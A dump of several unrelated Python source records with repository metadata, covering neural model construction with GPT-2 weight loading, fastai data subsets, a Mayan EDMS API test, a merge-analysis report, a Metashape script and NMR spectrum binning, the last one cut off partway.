if model_opt.model_type == "text":
src_field = fields["src"]
src_emb = build_embeddings(model_opt, src_field)
else:
src_emb = None
encoder = build_encoder(model_opt, src_emb)
tgt_field = fields["tgt"]
tgt_emb = build_embeddings(model_opt, tgt_field, for_encoder=False)
if model_opt.share_embeddings:
assert src_field.base_field.vocab == tgt_field.base_field.vocab, \
"preprocess with -share_vocab if you use share_embeddings"
tgt_emb.word_lut.weight = src_emb.word_lut.weight
if model_opt.share_position_embeddings:
tgt_emb.make_embedding.pe.pe.weight = src_emb.make_embedding.pe.pe.weight
decoder = build_decoder(model_opt, tgt_emb)
if gpu and gpu_id is not None:
device = torch.device("cuda", gpu_id)
elif gpu and not gpu_id:
device = torch.device("cuda")
elif not gpu:
device = torch.device("cpu")
if model_opt.simple_fusion:
layers = 12
size = 768
heads = 12
lm_decoder_opt = copy.deepcopy(model_opt)
lm_decoder_opt.dec_layers = layers
lm_decoder_opt.use_GPT_version_ctxattn = False
lm_decoder_opt.use_GPT_version_psa = False
lm_decoder_opt.use_GPT_version_unconditional = True
lm_decoder_opt.tgt_word_vec_size = size
lm_decoder_opt.rnn_size = size
lm_decoder_opt.dec_rnn_size = size
lm_decoder_opt.transformer_ff = size*4
lm_decoder_opt.dec_heads = heads
lm_decoder_opt.position_encoding_learned_dec = True
lm_decoder_opt.share_decoder_embeddings = True
lm_decoder_opt.dropout = 0
lm_decoder_emb = build_embeddings(lm_decoder_opt, tgt_field, for_encoder=False)
logger.info(lm_decoder_emb)
lm_decoder = build_decoder(lm_decoder_opt, lm_decoder_emb)
load_decoder = lm_decoder
model = onmt.models.SimpleFusionModel(encoder, decoder, lm_decoder)
generator = SimpleFusionGenerator(model_opt.dec_rnn_size,
lm_decoder_opt.dec_rnn_size,
len(fields["tgt"].base_field.vocab))
generator.lm_linear.weight = lm_decoder.embeddings.word_lut.weight
if model_opt.share_decoder_embeddings:
generator.decoder_linear.weight = decoder.embeddings.word_lut.weight
gen_linear = generator.lm_linear
else:
load_decoder = decoder
if model_opt.unconditional:
model = onmt.models.UncondModel(decoder)
elif model_opt.num_src > 1:
from argparse import Namespace
agenda_field = fields["agenda"]
agenda_opt = Namespace(**model_opt.__dict__)
for k in agenda_opt.__dict__.keys():
if hasattr(model_opt, f"agenda_{k}"):
setattr(agenda_opt, k, getattr(model_opt, f"agenda_{k}"))
agenda_emb = build_embeddings(agenda_opt, agenda_field)
agenda_encoder = build_encoder(model_opt, agenda_emb)
encoders = nn.ModuleList([encoder, agenda_encoder])
model = onmt.neural_checklist.MultiSrcNMTModel(encoders, decoder)
else:
model = onmt.models.NMTModel(encoder, decoder)
if not model_opt.copy_attn:
if model_opt.generator_function == "sparsemax":
gen_func = onmt.modules.sparse_activations.LogSparsemax(dim=-1)
else:
gen_func = nn.LogSoftmax(dim=-1)
if model_opt.padded_vocab_fix_me_later:
gen_func = nn.Sequential(PadGen(), gen_func)
generator = nn.Sequential(
nn.Linear(model_opt.dec_rnn_size,
len(fields["tgt"].base_field.vocab)),
Cast(torch.float32),
gen_func
)
if model_opt.share_decoder_embeddings:
generator[0].weight = decoder.embeddings.word_lut.weight
gen_linear = generator[0]
else:
tgt_base_field = fields["tgt"].base_field
vocab_size = len(tgt_base_field.vocab)
pad_idx = tgt_base_field.vocab.stoi[tgt_base_field.pad_token]
generator = CopyGenerator(model_opt.dec_rnn_size, vocab_size, pad_idx)
if model_opt.share_decoder_embeddings:
generator.linear.weight = decoder.embeddings.word_lut.weight
gen_linear = generator.linear
if model_opt.encdec_share_params:
for name, p in decoder.named_parameters():
if 'ctx' in name or 'context' in name:
continue
pointer = encoder
attrs = name.split('.')
for attr_name in attrs[:-1]:
pointer = getattr(pointer, attr_name)
setattr(pointer, attrs[-1], p)
if checkpoint is not None:
if 'gpt2_params' not in checkpoint and 'enc_model' not in checkpoint:
def fix_key(s):
s = re.sub(r'(.*)\.layer_norm((_\d+)?)\.b_2',
r'\1.layer_norm\2.bias', s)
s = re.sub(r'(.*)\.layer_norm((_\d+)?)\.a_2',
r'\1.layer_norm\2.weight', s)
return s
checkpoint['model'] = {fix_key(k): v
for k, v in checkpoint['model'].items()}
if hasattr(model_opt, 'load_uncond_from') and model_opt.load_uncond_from:
for p in decoder.parameters():
if p.dim() > 1:
xavier_uniform_(p)
for p in encoder.parameters():
if p.dim() > 1:
xavier_uniform_(p)
if model_opt.ctx_weight_param:
for name, p in decoder.named_parameters():
if 'ctx_weight' in name:
p.data.zero_()
if 'ctx_bias' in name:
p.data.fill_(-10)
model.load_state_dict(checkpoint['model'], strict=False)
generator.load_state_dict(checkpoint['generator'], strict=False)
else:
if 'gpt2_params' in checkpoint:
init_something = model_opt.gpt2_init_embanddec or model_opt.simple_fusion or model_opt.gpt2_init_embandenc or model_opt.GPT_representation_mode != 'none'
if init_something:
if model_opt.gpt2_init_zero:
for p in decoder.parameters():
p.data.zero_()
if model_opt.simple_fusion:
generator.decoder_linear.weight.data.zero_()
generator.decoder_linear.bias.data.zero_()
else:
for p in decoder.parameters():
if p.dim() > 1:
xavier_uniform_(p)
if encoder is not None:
for p in encoder.parameters():
if p.dim() > 1:
xavier_uniform_(p)
for p in generator.parameters():
if p.dim() > 1:
xavier_uniform_(p)
if model_opt.zero_bias_init:
gen_linear.bias.data.zero_()
if model_opt.ctx_weight_param:
for name, p in decoder.named_parameters():
if 'ctx_weight' in name:
p.data.zero_()
if 'ctx_bias' in name:
p.data.fill_(-10)
gen_linear.bias.data.zero_()
load_models = []
if model_opt.GPT_representation_mode != 'none':
load_embs = []
if model_opt.GPT_representation_loc in ['both', 'src']:
load_models.append(src_emb.gpt_model)
load_embs.append(src_emb)
if model_opt.GPT_representation_loc in ['both', 'tgt']:
load_models.append(tgt_emb.gpt_model)
load_embs.append(tgt_emb)
else:
if model_opt.gpt2_init_embanddec or model_opt.simple_fusion:
load_models = [load_decoder]
elif model_opt.gpt2_init_embandenc:
load_models = [encoder]
it_list = list(checkpoint['gpt2_params'])
for lm_idx, load_model in enumerate(load_models):
for name, array in it_list:
name = name[6:]
name = name.split('/')
assigned = False
if name[0] == 'wpe':
if model_opt.GPT_representation_mode != 'none':
pointer = load_embs[lm_idx].make_embedding.pe.pe.weight
else:
pointer = load_model.embeddings.make_embedding.pe.pe.weight
elif name[0] == 'wte':
if model_opt.GPT_representation_mode != 'none':
pointer = [load_embs[lm_idx].make_embedding.emb_luts[0].weight, gen_linear.weight]
else:
pointer = [load_model.embeddings.make_embedding.emb_luts[0].weight]
if not model_opt.nopretrain_decemb:
pointer.append(gen_linear.weight)
if model_opt.simple_fusion and model_opt.sf_pretrain_dec_emb:
pointer.append(decoder.embeddings.make_embedding.emb_luts[0].weight)
elif name[0] == 'ln_f':
if name[1] == 'g':
pointer = load_model.layer_norm.weight
elif name[1] == 'b':
pointer = load_model.layer_norm.bias
else:
raise ValueError('I am missing something here!')
elif name[0][0] == 'h':
layer_num = name[0][1:]
pointer = getattr(load_model.transformer_layers, layer_num)
if name[1] == 'attn':
assigned = True
pointer = pointer.self_attn
full_data = torch.from_numpy(array)
if name[2] == 'c_attn':
end_size = full_data.shape[-1]//3
assert full_data.shape[-1] % 3 == 0
if name[3] == 'b':
if init_something:
pointer.linear_query.bias.data = full_data[:end_size]
pointer.linear_keys.bias.data = full_data[end_size:end_size*2]
pointer.linear_values.bias.data = full_data[end_size*2:]
if model_opt.gpt2_params_std > 0:
pointer.linear_query.bias.orig = full_data[:end_size].clone()
pointer.linear_keys.bias.orig = full_data[end_size:end_size*2].clone()
pointer.linear_values.bias.orig = full_data[end_size*2:].clone()
elif name[3] == 'w':
if init_something:
pointer.linear_query.weight.data = full_data[:, :end_size].t().contiguous()
pointer.linear_keys.weight.data = full_data[:, end_size:end_size*2].t().contiguous()
pointer.linear_values.weight.data = full_data[:, end_size*2:].t().contiguous()
if model_opt.gpt2_params_std > 0:
pointer.linear_query.weight.orig = full_data[:, :end_size].t().contiguous().clone()
pointer.linear_keys.weight.orig = full_data[:, end_size:end_size*2].t().contiguous().clone()
pointer.linear_values.weight.orig = full_data[:, end_size*2:].t().contiguous().clone()
else:
raise ValueError('I am missing something here!')
elif name[2] == 'c_proj':
if name[3] == 'b':
if init_something:
pointer.final_linear.bias.data = full_data
if model_opt.gpt2_params_std > 0:
pointer.final_linear.bias.orig = full_data.clone()
elif name[3] == 'w':
if init_something:
pointer.final_linear.weight.data = full_data.t().contiguous()
if model_opt.gpt2_params_std > 0:
pointer.final_linear.weight.orig = full_data.t().contiguous().clone()
else:
raise ValueError('I am missing something here!')
elif name[1] == 'ln_1' or name[1] == 'ln_2':
num = name[1][3]
pointer = getattr(pointer, 'layer_norm_'+num)
if name[2] == 'b':
pointer = pointer.bias
elif name[2] == 'g':
pointer = pointer.weight
else:
raise ValueError('I am missing something here!')
elif name[1] == 'mlp':
pointer = pointer.feed_forward
pointer = getattr(pointer, name[2])
if name[3] == 'b':
pointer = pointer.bias
elif name[3] == 'w':
pointer = pointer.weight
else:
raise ValueError('I am missing something here!')
else:
raise ValueError('I am missing something here!')
else:
raise ValueError('I am missing something here!')
if not assigned:
if name[-1] == 'w' or name[-1] == 'g':
array = array.T
if not isinstance(pointer, list):
pointer = [pointer]
for pointer_i in pointer:
target_size = int(math.ceil(array.shape[0]/8))*8
padded_vocab = name[0] == 'wte' and pointer_i.shape[0] == target_size
padded_vocab = padded_vocab and pointer_i.shape[1:] == array.shape[1:]
try:
assert pointer_i.shape == array.shape or padded_vocab
except AssertionError as e:
e.args += (pointer_i.shape, array.shape)
raise
if init_something:
print("Initialize PyTorch weight {}".format(name))
if padded_vocab:
pointer_i.data[:array.shape[0]] = torch.from_numpy(array)
else:
pointer_i.data = torch.from_numpy(array)
if model_opt.gpt2_params_std > 0:
if padded_vocab:
raise NotImplementedError
else:
pointer_i.orig = torch.from_numpy(array).clone()
if 'enc_model' in checkpoint:
load_dict = {k[8:]: v for k, v in checkpoint['enc_model'] if 'encoder' in k}
encoder.load_state_dict(load_dict, strict=True)
else:
if model_opt.param_init != 0.0:
for p in model.parameters():
p.data.uniform_(-model_opt.param_init, model_opt.param_init)
for p in generator.parameters():
p.data.uniform_(-model_opt.param_init, model_opt.param_init)
if model_opt.param_init_glorot:
for p in model.parameters():
if p.dim() > 1:
xavier_uniform_(p)
for p in generator.parameters():
if p.dim() > 1:
xavier_uniform_(p)
if not model_opt.unconditional and hasattr(model.encoder, 'embeddings') \
and model.encoder.embeddings is not None:
model.encoder.embeddings.load_pretrained_vectors(
model_opt.pre_word_vecs_enc)
if hasattr(model.decoder, 'embeddings'):
model.decoder.embeddings.load_pretrained_vectors(
model_opt.pre_word_vecs_dec)
if model_opt.notrain_emb or model_opt.notrain_embanddec:
if model_opt.position_encoding_learned_enc and model_opt.share_position_embeddings:
model.encoder.embeddings.make_embedding.pe.pe.weight.requires_grad = False
if model_opt.share_embeddings:
model.encoder.embeddings.make_embedding.emb_luts[0].weight.requires_grad = False
model.decoder.embeddings.make_embedding.pe.pe.weight.requires_grad = False
model.decoder.embeddings.make_embedding.emb_luts[0].weight.requires_grad = False
generator[0].weight.requires_grad = False
if model_opt.notrain_genbias:
generator[0].bias.requires_grad = False
if model_opt.notrain_embanddec:
for name, p in load_decoder.layer_norm.named_parameters():
p.requires_grad = False
for name, p in load_decoder.transformer_layers.named_parameters():
if 'context' not in name and 'ctx' not in name:
p.requires_grad = False
if model_opt.onlytrainln:
for name, p in model.decoder.named_parameters():
if 'layer_norm' not in name:
p.requires_grad = False
for p in generator.parameters():
p.requires_grad = False
if model_opt.onlytrainoutp:
if model_opt.share_decoder_embeddings:
raise ValueError
for p in model.decoder.parameters():
p.requires_grad = False
if model_opt.simple_fusion:
for p in lm_decoder.parameters():
p.requires_grad = False
for p in generator.lm_linear.parameters():
p.requires_grad = False
model.generator = generator
model.to(device)
if model_opt.model_dtype == 'fp16':
model.half()
for p in model.parameters():
if hasattr(p, 'orig'):
p.orig = p.orig.to(device)
if model_opt.model_dtype == 'fp16':
p.orig = p.orig.half()
return model
def linear_repr_patch(self):
return 'in_features={}, out_features={}, bias={}, wgrad={}, bgrad={}'.format(
self.in_features, self.out_features, self.bias is not None,
self.weight.requires_grad, self.bias.requires_grad if self.bias is not None else 'N/A'
)
def ln_repr_patch(self):
string = '{normalized_shape}, eps={eps}, ' \
'elementwise_affine={elementwise_affine}'.format(**self.__dict__)
string += ', wgrad={}, bgrad={}'.format(self.weight.requires_grad if self.weight is not None else 'N/A',
self.bias.requires_grad if self.bias is not None else 'N/A')
return string
def emb_repr_patch(self):
s = '{num_embeddings}, {embedding_dim}'
if self.padding_idx is not None:
s += ', padding_idx={padding_idx}'
if self.max_norm is not None:
s += ', max_norm={max_norm}'
if self.norm_type != 2:
s += ', norm_type={norm_type}'
if self.scale_grad_by_freq is not False:
s += ', scale_grad_by_freq={scale_grad_by_freq}'
if self.sparse is not False:
s += ', sparse=True'
s = s.format(**self.__dict__)
s += ', grad={}'.format(self.weight.requires_grad)
return s
def build_model(model_opt, opt, fields, checkpoint):
logger.info('Building model...')
model = build_base_model(model_opt, fields, use_gpu(opt), checkpoint)
nn.Linear.extra_repr = linear_repr_patch
nn.LayerNorm.extra_repr = ln_repr_patch
nn.Embedding.extra_repr = emb_repr_patch
logger.info(model)
return model
| true
| true
|
1c4246c3000494cc4c4d7a4c26fd49406dd8cde8
| 3,398
|
py
|
Python
|
dev/local/data/source.py
|
LaurenSpiegel/fastai_docs
|
4fe6b62116d88dea9610548133e6cadb6b260a73
|
[
"Apache-2.0"
] | null | null | null |
dev/local/data/source.py
|
LaurenSpiegel/fastai_docs
|
4fe6b62116d88dea9610548133e6cadb6b260a73
|
[
"Apache-2.0"
] | null | null | null |
dev/local/data/source.py
|
LaurenSpiegel/fastai_docs
|
4fe6b62116d88dea9610548133e6cadb6b260a73
|
[
"Apache-2.0"
] | null | null | null |
#AUTOGENERATED! DO NOT EDIT! File to edit: dev/05_data_source.ipynb (unless otherwise specified).
__all__ = ['DataSource', 'DsrcSubset', 'DsrcSubset']
from ..imports import *
from ..test import *
from ..core import *
from .core import *
from .pipeline import *
from ..notebook.showdoc import show_doc
@docs
class DataSource(PipedList):
"Applies a `Pipeline` of `tfms` to filtered subsets of `items`"
def __init__(self, items, tfms=None, filts=None):
if filts is None: filts = [range_of(items)]
self.filts = L(mask2idxs(filt) for filt in filts)
# Create map from item id to filter id
assert all_disjoint(self.filts)
self.filt_idx = L([None]*len(items))
for i,f in enumerate(self.filts): self.filt_idx[f] = i
super().__init__(items, tfms)
@property
def n_subsets(self): return len(self.filts)
def len(self,filt): return len(self.filts[filt])
def subset(self, i): return DsrcSubset(self, i)
def subsets(self): return map(self.subset, range(self.n_subsets))
def __repr__(self): return '\n'.join(map(str,self.subsets())) + f'\ntfm - {self.tfm}'
def __getitem__(self, i):
"Transformed item(s) at `i`"
its,fts = self.items[i],self.filt_idx[i]
if is_iter(i): return L(self.tfm(it, filt=f) for it,f in zip(its,fts))
else: return self.tfm(its, filt=fts)
_docs = dict(len="`len` of subset `filt`",
subset="Filtered `DsrcSubset` `i`",
subsets="Iterator for all subsets")
DataSource.train,DataSource.valid = add_props(lambda i,x: x.subset(i), 2)
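# Illustrative usage sketch (hypothetical items and filters, not part of the notebook export):
#
#     items = list(range(10))
#     dsrc = DataSource(items, tfms=None, filts=[range(8), range(8, 10)])
#     dsrc.n_subsets        # 2
#     len(dsrc.valid)       # 2 -> DsrcSubset over items 8 and 9
#     dsrc.train[0]         # item 0 passed through the (empty) Pipeline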
@docs
class DsrcSubset():
"A filtered subset of a `DataSource`"
def __init__(self, dsrc, filt): self.dsrc,self.filt,self.filts = dsrc,filt,dsrc.filts[filt]
def __getitem__(self,i): return self.dsrc[self.filts[i]]
def decode(self, o, **kwargs): return self.dsrc.decode(o, self.filt, **kwargs)
def decode_at(self, i, **kwargs): return self.decode(self[i], **kwargs)
def show_at (self, i, **kwargs): return self.dsrc.show(self.decode_at(i), **kwargs)
def __len__(self): return len(self.filts)
def __eq__(self,b): return all_equal(b,self)
def __repr__(self): return coll_repr(self)
_docs = dict(decode="Transform decode",
__getitem__="Encoded item(s) at `i`",
decode_at="Decoded item at `i`",
show_at="Show item at `i`")
@docs
class DsrcSubset():
"A filtered subset of a `DataSource`"
def __init__(self, dsrc, filt): self.dsrc,self.filt,self.filts = dsrc,filt,dsrc.filts[filt]
def __getitem__(self,i): return self.dsrc[self.filts[i]]
def decode(self, o, **kwargs): return self.dsrc.decode(o, filt=self.filt, **kwargs)
def decode_batch(self, b, **kwargs): return self.dsrc.decode_batch(b, filt=self.filt, **kwargs)
def decode_at(self, i, **kwargs): return self.decode(self[i], **kwargs)
def show_at (self, i, **kwargs): return self.dsrc.show(self[i], filt=self.filt, **kwargs)
def __len__(self): return len(self.filts)
def __eq__(self,b): return all_equal(b,self)
def __repr__(self): return coll_repr(self)
_docs = dict(decode="Transform decode",
decode_batch="Transform decode batch",
__getitem__="Encoded item(s) at `i`",
decode_at="Decoded item at `i`",
show_at="Show decoded item at `i`")
| 44.12987
| 99
| 0.64744
|
__all__ = ['DataSource', 'DsrcSubset', 'DsrcSubset']
from ..imports import *
from ..test import *
from ..core import *
from .core import *
from .pipeline import *
from ..notebook.showdoc import show_doc
@docs
class DataSource(PipedList):
def __init__(self, items, tfms=None, filts=None):
if filts is None: filts = [range_of(items)]
self.filts = L(mask2idxs(filt) for filt in filts)
assert all_disjoint(self.filts)
self.filt_idx = L([None]*len(items))
for i,f in enumerate(self.filts): self.filt_idx[f] = i
super().__init__(items, tfms)
@property
def n_subsets(self): return len(self.filts)
def len(self,filt): return len(self.filts[filt])
def subset(self, i): return DsrcSubset(self, i)
def subsets(self): return map(self.subset, range(self.n_subsets))
def __repr__(self): return '\n'.join(map(str,self.subsets())) + f'\ntfm - {self.tfm}'
def __getitem__(self, i):
its,fts = self.items[i],self.filt_idx[i]
if is_iter(i): return L(self.tfm(it, filt=f) for it,f in zip(its,fts))
else: return self.tfm(its, filt=fts)
_docs = dict(len="`len` of subset `filt`",
subset="Filtered `DsrcSubset` `i`",
subsets="Iterator for all subsets")
DataSource.train,DataSource.valid = add_props(lambda i,x: x.subset(i), 2)
@docs
class DsrcSubset():
def __init__(self, dsrc, filt): self.dsrc,self.filt,self.filts = dsrc,filt,dsrc.filts[filt]
def __getitem__(self,i): return self.dsrc[self.filts[i]]
def decode(self, o, **kwargs): return self.dsrc.decode(o, self.filt, **kwargs)
def decode_at(self, i, **kwargs): return self.decode(self[i], **kwargs)
def show_at (self, i, **kwargs): return self.dsrc.show(self.decode_at(i), **kwargs)
def __len__(self): return len(self.filts)
def __eq__(self,b): return all_equal(b,self)
def __repr__(self): return coll_repr(self)
_docs = dict(decode="Transform decode",
__getitem__="Encoded item(s) at `i`",
decode_at="Decoded item at `i`",
show_at="Show item at `i`")
@docs
class DsrcSubset():
def __init__(self, dsrc, filt): self.dsrc,self.filt,self.filts = dsrc,filt,dsrc.filts[filt]
def __getitem__(self,i): return self.dsrc[self.filts[i]]
def decode(self, o, **kwargs): return self.dsrc.decode(o, filt=self.filt, **kwargs)
def decode_batch(self, b, **kwargs): return self.dsrc.decode_batch(b, filt=self.filt, **kwargs)
def decode_at(self, i, **kwargs): return self.decode(self[i], **kwargs)
def show_at (self, i, **kwargs): return self.dsrc.show(self[i], filt=self.filt, **kwargs)
def __len__(self): return len(self.filts)
def __eq__(self,b): return all_equal(b,self)
def __repr__(self): return coll_repr(self)
_docs = dict(decode="Transform decode",
decode_batch="Transform decode batch",
__getitem__="Encoded item(s) at `i`",
decode_at="Decoded item at `i`",
show_at="Show decoded item at `i`")
| true
| true
|
1c424705772097a3c80a8562483cdfce635a7dd3
| 403
|
py
|
Python
|
mayan/apps/common/tests/test_api.py
|
nattangwiwat/Mayan-EDMS-recitation
|
fcf16afb56eae812fb99144d65ae1ae6749de0b7
|
[
"Apache-2.0"
] | 343
|
2015-01-05T14:19:35.000Z
|
2018-12-10T19:07:48.000Z
|
mayan/apps/common/tests/test_api.py
|
nattangwiwat/Mayan-EDMS-recitation
|
fcf16afb56eae812fb99144d65ae1ae6749de0b7
|
[
"Apache-2.0"
] | 191
|
2015-01-03T00:48:19.000Z
|
2018-11-30T09:10:25.000Z
|
mayan/apps/common/tests/test_api.py
|
nattangwiwat/Mayan-EDMS-recitation
|
fcf16afb56eae812fb99144d65ae1ae6749de0b7
|
[
"Apache-2.0"
] | 257
|
2019-05-14T10:26:37.000Z
|
2022-03-30T03:37:36.000Z
|
from rest_framework import status
from mayan.apps.rest_api.tests.base import BaseAPITestCase
from .mixins import CommonAPITestMixin
class CommonAPITestCase(CommonAPITestMixin, BaseAPITestCase):
auto_login_user = False
def test_content_type_list_api_view(self):
response = self._request_content_type_list_api_view()
self.assertEqual(response.status_code, status.HTTP_200_OK)
| 28.785714
| 66
| 0.808933
|
from rest_framework import status
from mayan.apps.rest_api.tests.base import BaseAPITestCase
from .mixins import CommonAPITestMixin
class CommonAPITestCase(CommonAPITestMixin, BaseAPITestCase):
auto_login_user = False
def test_content_type_list_api_view(self):
response = self._request_content_type_list_api_view()
self.assertEqual(response.status_code, status.HTTP_200_OK)
| true
| true
|
1c4247727af42b6f5aaf853eecedbf57120e3803
| 2,415
|
py
|
Python
|
checkmerge/analysis/report.py
|
jjkester/checkmerge
|
23d1d9982cd7dc333b5748be3415e9b92f6576f4
|
[
"Apache-2.0"
] | 1
|
2019-06-16T07:57:15.000Z
|
2019-06-16T07:57:15.000Z
|
checkmerge/analysis/report.py
|
jjkester/checkmerge
|
23d1d9982cd7dc333b5748be3415e9b92f6576f4
|
[
"Apache-2.0"
] | null | null | null |
checkmerge/analysis/report.py
|
jjkester/checkmerge
|
23d1d9982cd7dc333b5748be3415e9b92f6576f4
|
[
"Apache-2.0"
] | null | null | null |
import collections
import itertools
import typing
from checkmerge import analysis, report
class AnalysisResultMaxSeverityMetric(report.Metric):
"""
Metric for the maximum analysis result severity within a type.
"""
name = 'Max. severity'
low = .5
high = 1.5
def __init__(self, items: typing.List[analysis.AnalysisResult]):
"""
:param items: The results of the given type.
"""
value = max((item.severity for item in items))
super(AnalysisResultMaxSeverityMetric, self).__init__(value)
class AnalysisResultAvgSeverityMetric(report.Metric):
"""
Metric for the average analysis result severity within a type.
"""
name = 'Avg. severity'
low = .5
high = 1.5
def __init__(self, items: typing.List[analysis.AnalysisResult]):
"""
:param items: The results of the given type.
"""
value = sum((item.severity for item in items)) / float(len(items))
super(AnalysisResultAvgSeverityMetric, self).__init__(value)
class AnalysisResultMetric(report.Metric):
"""
Parent metric for types of analysis results.
"""
low = 1
high = 5
def __init__(self, cls: typing.Type[analysis.AnalysisResult], items: typing.List[analysis.AnalysisResult]):
self.name = cls.name
items = list(items)
max_severity = AnalysisResultMaxSeverityMetric(items)
avg_severity = AnalysisResultAvgSeverityMetric(items)
super(AnalysisResultMetric, self).__init__(len(items), children=[max_severity, avg_severity])
class AnalysisReport(report.Report):
"""
Report for analysis results.
"""
has_metrics = True
has_conflicts = True
def __init__(self, results: typing.Iterable[analysis.AnalysisResult]):
self.results_by_type = collections.defaultdict(list)
for result in results:
self.results_by_type[result.__class__].append(result)
def get_metrics(self) -> typing.Iterable[report.Metric]:
for cls, items in sorted(self.results_by_type.items(), key=lambda i: i[0].name):
yield AnalysisResultMetric(cls, items)
def get_conflicts(self) -> typing.Iterable[analysis.AnalysisResult]:
return sorted(itertools.chain(*self.results_by_type.values()), key=lambda r: -r.severity)
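# Illustrative usage sketch (hypothetical `results` iterable, not from the original file):
#
#     rep = AnalysisReport(results)             # results: Iterable[analysis.AnalysisResult]
#     for metric in rep.get_metrics():          # one AnalysisResultMetric per result type
#         print(metric.name)
#     worst_first = list(rep.get_conflicts())   # all results, highest severity first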
| 31.776316
| 111
| 0.677847
|
import collections
import itertools
import typing
from checkmerge import analysis, report
class AnalysisResultMaxSeverityMetric(report.Metric):
name = 'Max. severity'
low = .5
high = 1.5
def __init__(self, items: typing.List[analysis.AnalysisResult]):
value = max((item.severity for item in items))
super(AnalysisResultMaxSeverityMetric, self).__init__(value)
class AnalysisResultAvgSeverityMetric(report.Metric):
name = 'Avg. severity'
low = .5
high = 1.5
def __init__(self, items: typing.List[analysis.AnalysisResult]):
value = sum((item.severity for item in items)) / float(len(items))
super(AnalysisResultAvgSeverityMetric, self).__init__(value)
class AnalysisResultMetric(report.Metric):
low = 1
high = 5
def __init__(self, cls: typing.Type[analysis.AnalysisResult], items: typing.List[analysis.AnalysisResult]):
self.name = cls.name
items = list(items)
max_severity = AnalysisResultMaxSeverityMetric(items)
avg_severity = AnalysisResultAvgSeverityMetric(items)
super(AnalysisResultMetric, self).__init__(len(items), children=[max_severity, avg_severity])
class AnalysisReport(report.Report):
has_metrics = True
has_conflicts = True
def __init__(self, results: typing.Iterable[analysis.AnalysisResult]):
self.results_by_type = collections.defaultdict(list)
for result in results:
self.results_by_type[result.__class__].append(result)
def get_metrics(self) -> typing.Iterable[report.Metric]:
for cls, items in sorted(self.results_by_type.items(), key=lambda i: i[0].name):
yield AnalysisResultMetric(cls, items)
def get_conflicts(self) -> typing.Iterable[analysis.AnalysisResult]:
return sorted(itertools.chain(*self.results_by_type.values()), key=lambda r: -r.severity)
| true
| true
|
1c42484dfb1349b7f128742b125618ab7f66f4ea
| 553
|
py
|
Python
|
_singleActions-AsScripts/04_AnalyzePhotos.py
|
campbell-ja/MetashapePythonScripts
|
b4a54e49558a8a7d1c5dc2327f878a8c354bbe58
|
[
"CC0-1.0"
] | 4
|
2021-06-17T03:06:19.000Z
|
2022-02-08T17:39:29.000Z
|
_singleActions-AsScripts/04_AnalyzePhotos.py
|
campbell-ja/MetashapePythonScripts
|
b4a54e49558a8a7d1c5dc2327f878a8c354bbe58
|
[
"CC0-1.0"
] | null | null | null |
_singleActions-AsScripts/04_AnalyzePhotos.py
|
campbell-ja/MetashapePythonScripts
|
b4a54e49558a8a7d1c5dc2327f878a8c354bbe58
|
[
"CC0-1.0"
] | null | null | null |
# This script created by Joseph Aaron Campbell - 10/2020
""" Set up Working Environment """
# import Metashape library module
import Metashape
# create a reference to the current project via Document Class
doc = Metashape.app.document
# set reference for the currently active chunk
activeChunk = Metashape.app.document.chunk
# Estimate image quality
# this populates the 'Quality' column in the photos pane, under 'details' view
# this is not indicative of the actual image quality and is just here for example
activeChunk.analyzePhotos()
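# Possible follow-up (illustrative, not part of the original script): after analyzePhotos()
# each camera carries its estimate in metadata; the key name ('Image/Quality' in recent
# Metashape releases) should be verified against your Metashape version.
# for camera in activeChunk.cameras:
#     print(camera.label, camera.meta['Image/Quality'])
# doc.save()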
| 39.5
| 82
| 0.772152
|
import Metashape
doc = Metashape.app.document
activeChunk = Metashape.app.document.chunk
activeChunk.analyzePhotos()
| true
| true
|
1c424a3c4b56515039f7ae7f528464de549d5d37
| 2,216
|
py
|
Python
|
py-code/nmrvar.py
|
alvicler/python-nmr
|
7b68275f0e1e8dd85622a6b796dc618eb5ac3e62
|
[
"BSD-3-Clause"
] | null | null | null |
py-code/nmrvar.py
|
alvicler/python-nmr
|
7b68275f0e1e8dd85622a6b796dc618eb5ac3e62
|
[
"BSD-3-Clause"
] | null | null | null |
py-code/nmrvar.py
|
alvicler/python-nmr
|
7b68275f0e1e8dd85622a6b796dc618eb5ac3e62
|
[
"BSD-3-Clause"
] | null | null | null |
#!/usr/bin/env python
# coding: utf-8
# In[ ]:
import nmrglue as ng
import sys
import numpy as np
import pandas as pd
get_ipython().run_line_magic('matplotlib', 'qt5')
import matplotlib.pyplot as plt
#import matplotlib
#print('Python version ' + sys.version)
#print('Pandas version ' + pd.__version__)
#print('Matplotlib version ' + matplotlib.__version__)
import os
samples = len(os.listdir('urine'))
this = sys.modules[__name__] # this is now your current namespace
def find_nearest(array, value):
array = np.asarray(array)
idx = (np.abs(array - value)).argmin()
return idx # or array[idx]
i = 1
df = pd.DataFrame([])
yarr=[]
xarr=[]
## set the number of 1r files to open, always open first processed spectra ##
while i < samples+1:
name="urine/Calvin_Gab_ATU"+str(i)+"/1/pdata/1"
dic, data= ng.bruker.read_pdata(name)
sf=float(dic["procs"]["SF"])
sfo1=float(dic["acqus"]["SFO1"])
o1=float(dic["acqus"]["O1"])
hzppt=float(dic["acqus"]["SW_h"])/len(data)
swh=float(dic["acqus"]["SW_h"])
sr=o1+(sf-sfo1)*1000000.
pts=int(sr//hzppt) # Calc pts to Calibrate 0ppm to Xscale
data = ng.proc_base.rev(data) # reverse the data
#setattr(this, 'data%s' % i, data)
#### scale x from pts to ppm ###
## Bin size for PCA##
si=len(data)
xs=[]
for j in range(0-pts,si-pts):
hz=float(((o1-swh/2)+(hzppt*(j)))/sf)
xs+=[hz]
xs = np.asarray(xs)
#setattr(this, 'xs%s' % i, xs)
#xmin=xs.min()
xmin=-.25
#xmax=xs.max()
xmax=1.4
## Bin size for PCA##
xbin=(xmax-xmin)/5
#xbin=.25
k=1
f=0
a={}
for j in np.arange(xmin,xmax, xbin):
f=j+xbin
fpos=find_nearest(xs, f)
jpos=find_nearest(xs, j)
#print(jpos,fpos)
peak = data[jpos:fpos]
#peak_scale=xs[j:f]
#if peak.sum()<0:
# a['slice.'+str(k)]=0
#else:
#a[k]=peak.max().cumsum()
a[k]=peak.sum()
k+=1
#setattr(this, 'databin%s' % i, a)
b=pd.Series(a, name=i)
df = df.append(b)
yarr.append(data)
xarr.append(xs)
i += 1 ## index for number of spectra
df
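# Illustrative next step (assumes scikit-learn is available; the binning above prepares df for PCA):
#     from sklearn.decomposition import PCA
#     scores = PCA(n_components=2).fit_transform(df.fillna(0).values)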
| 22.845361
| 77
| 0.570397
|
import nmrglue as ng
import sys
import numpy as np
import pandas as pd
get_ipython().run_line_magic('matplotlib', 'qt5')
